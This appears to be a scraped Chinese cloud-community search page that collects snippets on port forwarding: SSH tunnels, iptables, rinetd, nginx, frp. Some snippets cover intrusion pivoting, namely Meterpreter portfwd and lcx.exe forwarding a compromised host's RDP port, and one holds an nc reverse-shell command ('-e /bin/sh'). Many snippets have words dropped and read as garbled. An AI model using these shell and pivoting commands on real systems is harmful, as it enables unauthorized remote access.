展开

关键词

SSH

ssh 会自动加密和解密所有的ssh客户与服务之间的网络数据。但是ssh 还提供了一个的功能。 :80 root@10.0.0.2 * -L 表示 使用 本地 建立ssh隧道 * 选用 -f 后台建立隧道 * -N 建议隧道后不执行命令 * -fNR * 本地: 本地是 表示本地的上的数据通讯都会被到目标主机的对应上 * 访问本地主机的30000 A,就相当于访问目标主机的B,当方粉本地的时,通讯数据会到目标主机的B,这就是本地 * 访问A的30000 到了10.0.0.2 上的 建立隧道连接 并在10.0.0.1上建立 30001 监听 * 在10.0.0.1 访问30001 的 会通过 到 服务10.0.0.2 的 80 动态 A: 10.0.0.1 B: 10.0.0.2 本地、远程都是需要一个我们已知的一个应用服务的的,但是如果没有的话,这里就需要用动态

1.2K50

SSH

但是今天要访问里面机器上的Web服务,我可以纠结了一会,后来想到了可以使用SSH的来实现。下面就看看怎么实现吧。 方法一:使用本地 这里本地的意思是说我运行 ssh 命令是在跳机器上,就是用自己机器的。 ssh -v -NL 0.0.0.0:8000:host2:8000 host2 使用浏览器访问 http://host1:8000 来验证效果。 方法二:使用远 这里远的意思是说我运行 ssh 命令是在服务机器上,这样跳机器相对来说就是远了,就是使用远机器的。 为了能通过远,首先需要修改一下 host1 上的 /etc/ssh/sshd_config 文件 AllowAgentForwarding yes AllowTcpForwarding yes

49140
  • 广告
    关闭

    腾讯云618采购季来袭!

    一键领取预热专享618元代金券,2核2G云服务器爆品秒杀低至18元!云产品首单低0.8折起,企业用户购买域名1元起…

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Meterpreter

    在本教程中,我们将使用Meterpreter将隧道连接到无法远程访问的服务。 :远程访问本地 假如你已经控制了目标主机,就可以开始了。 ? 在本地之前,首先来看看功能,以便更好地理解它到底做了什么。 Meterpreter portfwd命令将中继与所连接机器的TCP连接。 在以下步骤中,我们将使本地攻击机上的mySQL服务器3306可用,并将此上的流量到肉鸡.设置完成后,我们将使用mysql命令行连接到3306上的本地主机。 -p 肉鸡上的目标 -r 肉鸡上的IP或主机名。 当成功运行Meterpreter会话中的命令时,表示两个都已: ? 正如我们所看到的,当攻击者拥有对机器的shell访问权时,可以轻松地连接和

    45530

    Linux

    Linux iptables iptables -t nat -A PREROUTING -d 114.114.114.114 -p tcp -m tcp --dport 3389 -j DNAT -- 114.114.114.114 内网接地址10.0.0.254,内部服务器10.0.1.1233389 rinetd 编译安装 wget http://www.boutell.com/rinetd 、的地址 、 启动rinetd服务 rinetd -c /etc/rinetd.conf SSH ssh命令 本地执行建立隧道,通过本机访问内部主机 ssh -N -L 0.0.0.0 :888:192.168.10.1:55555 -p55555 root@192.168.10.1 -f #外网ssh访问主机888就可以连接到内网192.168.10.1; -L 本机

    2K30

    ----lcx.exe

    什么情况下需要: Web服务器在内网中,远程桌面无法连接,因此需要进行。 内网IP的80通过映射到外网IP的80上, 内网的WEB服务器通过外网IP反向代理,这个情况下需要进行 服务器处于外网,可以访问外部网络,但是服务器安装了防火墙来拒绝敏感的连接 我们有一个外网IP:10.22.124.132 在目标机器上执行lcx.exe -slave 10.22.124.132 6666 127.0.0.1 3389 意思是把目标机器的 3389与公网服务器的 6666绑定。 我们直接访问本机的9999,通过vps的,相当于访问的是目标主机的3389。 此时已经成功登陆进来,我们查看IP,可以看到是目标机器。

    1.3K90

    iptables

    Windows的,我们可以 点击这里 直达。但是我们今天的需求是用我们的linux来加速我们在美国的windows。 所以我们设定的案例如下 Windows IP:192.168.118.15 (我们使用内网IP段来代替) 3389 Linux IP:192.168.1.12 (我们使用内网另一个网段来代替) 1、我们开启linux的功能 vi /etc/sysctl.conf 将:net.ipv4.ip_forward=0更改为net.ipv4.ip_forward=1 sysctl -p #更新配置

    1.9K40

    nginx

    那么问题来了, 我的nginx 监听80的同时, go 服务器是无法同样监听80的. 这该如何是好啊, 给我整的一脸懵逼. nginx go 服务 不过想了一下, 现自己进入了思维误区. 为什么都要监听80呢? go 服务监听其他, 然后 nginx 将请求进行不就可以了么. 真是个傻子. 搜了一下 nginx 的配置, 确实有的配置. 如下: #配置负载均衡池 upstream test_go_pool{ server 127.0.0.1:8090; } #Demo2 server { listen error_log /var/log/nginx/test_go.error.log; access_log /var/log/nginx/test_go.access.log; #将所有请求给均衡池的应用处理

    1K10

    SSH

    概述: 让我们先来了解一下的概念吧。我们知道,SSH 会自动加密和解密所有 SSH 客户与服务之间的网络数据。但是,SSH 还同时提供了一个非常有用的功能,这就是方式: 共有三种方式,分别为本地,远程,动态 1:本地 原理: 将本地机(客户机)的某个到远指定机器的指定. 可以在配置文件中指定. 只有 root 才能特权。 sshserver             被机器的IP地址   同样的,我们以实验来具体说明我们的远程: 原理: 将远程主机(服务器)的某个到本地指定机器的指定. 可以在配置文件中指定. 只有用 root 登录远程主机才能特权

    52920

    NC

    实验环境 kali2020 (内网IP:192.168.123.33) Centos (百度云服务器) 实验目的 在 kali中获取百度云服务器的权限 PS: 需要提前开启相应额。 实现步骤 在kali中监听 5555 nc -lvp 5555 在百度云服务器中执行 nc 192.168.123.33 5555 -e /bin/sh 需要注意的是,因为服务器和kali不在同一网段 我在实际操作中用的是映射后的IP和。如果你的环境在同一网,直接执行上面命令即可。 实验结果 image.png 其他 当然,将两条命令反过来。便可以实现云服务器远程控制本地的kali。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/2323.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,载引用文章应遵循相同协议。

    12340

    Linux SSH

    也就能通过A访问B了 操作如下: #主机B执行(然后输入A的密码): ssh -R 6121:127.0.0.1:22 129.28.X.X -Nf 参数说明: -R 6121 A服务器所要开启的 127.0.0.1 目标(本次测试是B主机,也可以换成B能访问到的其他主机,这样A就能通过B访问其它主机了) :22 目标的 -Nf 后台启用,不打开shell 2020-03-13_161918.png 测试:在A服务器上连接本地6121即可 #主机A执行(然后输入B的密码 -L lp:r:rp sshserver -Nf ssh 协议 -L [bind_address:]port:host:hostport lp 本地 r 远程地址 rp 远程 sshserver 用来做ssh的主机。

    1K30

    Nginx请求&

    代理类型 正向/反向代理区别 正向代理:简单理解,服务不知道客户是谁,客户全部请求都是通过代理送给服务。 反向代理:客户不知道服务是谁,代理充当中中心的角色,一般用户负载均衡。 负载均衡,nginx做一般都属于反向代理。 nginx反向代理 官网介绍:https://docs.nginx.com/nginx/admin-guide/web-server/reverse-proxy/ HTTP请求 访问http:// localhost; location / { proxy_pass https://www.sina.com; } } } 本机监听1521到10.0.1.123:1521 user nginx; worker_processes auto; error_log /var/log/nginx/error.log;

    7410

    SSH

    SSH有三种模式,本地(Local Port Forwarding),远程(Remote Port Forwarding)以及动态(Dynamic Port Forwarding 什么是本地? 所谓本地,就是将送到本地的请求,到目标。这样,就可以通过访问本地,来访问目标的服务。 所谓远程,就是将送到远程的请求,到目标。这样,就可以通过访问远程,来访问目标的服务。 对于本地和远程,都存在两个一一对应的,分别位于SSH的客户和服务,而动态则只是绑定了一个本地,而目标地址:目标则是不固定的。 通过本地,将送到B主机3000的请求,到远程云主机C的2000

    1.2K80

    Centos7采用firewall-cmd让80至8080

    的外界访问权限,所以这点非常重要,需要用:firewall-cmd --zone=public --list-ports查看当前linux系统开放的号,也可以用netstat -tunlp 查看当前 linux系统正在监听的号,就知道自己想要的liunx系统号是否已经打开。 没有开放的,但是自己又需要用到的,那就马上用:firewall-cmd --permanent --zone=public --add-port=8080/tcp开放,其中数字就是你想要开放的号 , --permanent参数表示永久的意思,这样就不必每次启动防火墙的时候配置,tcp代表你要开放的号的网络协议,也可以是udp的。 3、将80的流量至8080: firewall-cmd --add-forward-port=port=80:proto=tcp:toport=8080 --permanent 4.最后别忘了

    1.4K30

    Meterpreter 教程

    在本教程中,我们将使用Meterpreter将隧道连接到无法远程访问的服务。 :远程访问本地 假如你已经控制了目标主机,就可以开始了。 ? 在本地之前,首先来看看功能,以便更好地理解它到底做了什么。 Meterpreter portfwd命令将中继与所连接机器的TCP连接。 在以下步骤中,我们将使本地攻击机上的mySQL服务器3306可用,并将此上的流量到肉鸡.设置完成后,我们将使用mysql命令行连接到3306上的本地主机。 -p 肉鸡上的目标 -r 肉鸡上的IP或主机名。 当成功运行Meterpreter会话中的命令时,表示两个都已: ? 正如我们所看到的,当攻击者拥有对机器的shell访问权时,可以轻松地连接和

    65630

    Linux 实现

    本文讲述了如何在Linux下实现,以实现通过V**连接至远开放给V**连接的计算机后,如何通过该计算机代理访问远内网中其它计算机。 于是就有了下面的办法,用B公司开放的服务器做,将A公司对B公司数据库服务器的访问请求,通过开放服务器到数据库服务器,间接实现对数据库服务器的访问。 安装rinetd服务 http://www.boutell.com/rinetd/ 配置规则 vi /etc/rinetd.conf 规则内容为: 本机IP地址 本机A 目标IP地址 目标 规则生效 pkill rinetd rinetd -c /etc/rinetd.conf 查看地址映射 netstat -antup 接下来,在 A公司这边就可以通过访问该开放服务器的【A】实现对B公司数据库服务器的访问了。

    95320

    工具rinetd

    是什么 我们先来了解几个名词的含义:映射,,反向代理,一同分析他们的相同点以及区别 映射 如果你去网上查找映射,大部分都是说路由器ADSL把公网IP映射到内网,这个一般是从路由器中设置的 就实现的功能效果和映射几乎一样,这两个名词的边界也比较含糊不清,如果上面把映射解释为从是处理路由器公网到内网,可以理解是系统级别的.一个简单的例子你的tomcat默认使用内网 8080,你需要在80上去访问,这个时候就需要把自己的80到8080,访问80的时候会被系统把请求到8080上接受. 使用rinetd进行 大家了解之后大致明白在什么场景下应该来使用了,我们通常配置时多半会使用Liunx的iptables来进行,但是这样有诸多不方便的地方,占用不提示,关闭不方便等等 ,后来就有了rinetd这个快速工具的诞生,我们来了解怎么使用rinetd来配置一个.

    853130

    Lcx内网

    工具介绍 Lcx是一个工具,有windows版和linux两个版本(linux版本名为protmap) 前期准备: 公网主机vps:103.45.99.224 受害机内网ip:127.0.0.1 工具使用 Windows 内网主机上执行:lcx.exe -slave <vps公网ip><vps公网><内网ip><内网> 例: 将内网主机(10.211.55.3)的3389到公网主机 公网主机上执行:lcx.exe -listen 9898 8989 将本机9898的流量到8989上 ? ? 公网vps尝试访问8989 ? ? Linux 内网主机上执行: . /portmap -m 3 -h1 <内网主机ip> -p1 <内网主机> -h2 <公网主机ip>-p2 <公网主机> 例: 将内网主机(172.17.0.13)的22到公网主机(103.45.99.224 公网主机上执行:lcx.exe -listen 9898 8989 将本机9898的流量到8989上 ? ? 收到会话,随后使用xshell链接 ? ? ?

    29420

    FRP内网

    工具使用 服务 vim frps.ini #绑定地址 bind_addr = 0.0.0.0 #TCP绑定 bind_port = 7000 #仪表盘地址 dashboard_addr = 0.0.0.0 = admin #HTTP代理 vhost_http_port = 10080 #HTTPS代理 vhost_https_port = 10443 然后运行. 客户 随后配置客户编辑客户配置文件 #服务器地址 server_addr = x.x.x.x #服务器绑定 server_port = 7000 #服务器连接密码 token = 12345678 #服务名称(自定义) [ssh] #协议类型 type = tcp #本地地址 local_ip = 127.0.0.1 #本地 local_port = 22 #远程 remote_port 此时frp隧道已经建立成功,可以通过访问vps的ip:7001就相当于访问了本地的22

    1.7K20

    Nc内网

    注:如果客户【相当于内网】连接服务器【相当于外网】,想获取服务器的shell,那么称为正向shell,如果是客户连接服务器,服务器想获取客户的shell,那么称为反向shell,另外有关于nc在

    1.3K10

    lcx实现

    lcx实现 概念 比较经典的就是lcx。简单说一下概念,首先内网中的主机一般都是使用的私有ip,在网络出处经过NAT换为公网ip后,才能访问internet。 所以,有时当我们进入网站后台cmd,或者捕获了一台内网中的肉鸡,是无法主动去链接这台肉鸡的,也不好在别人的网络出映射,这就体现lcx的作用了。 lcx实现,将肉鸡A上的某个(常用的3389),到具有公网地址的主机B上,这样我们只需要连接主机B的3389就相当于连接到了肉鸡A上,从而突破了内网私有ip的限制。 lcx.exe -slave 192.168.1.2 8080 192.168.1.3 3389 然后攻击者主机上执行: lcx.exe -listen 8080 9999 这样就将受害者主机的3389服务到攻击者本地的 9999上了。

    32310

    相关产品

    • 新能源监控与转发平台

      新能源监控与转发平台

      新能源监控与转发平台(EVMP)为您提供稳定、安全的新能源车辆实时监控系统,帮助您满足车企监控及国家监管法规要求。产品可用于新能源整车厂搭建自有车辆监控平台,并与新能源国标/地标平台对接场景中。也可用于为车企提供车辆数据统计、故障监控及解析、电池健康状态评估、车辆预测性维护等场景

    相关资讯

    热门标签

    扫码关注云+社区

    领取腾讯云代金券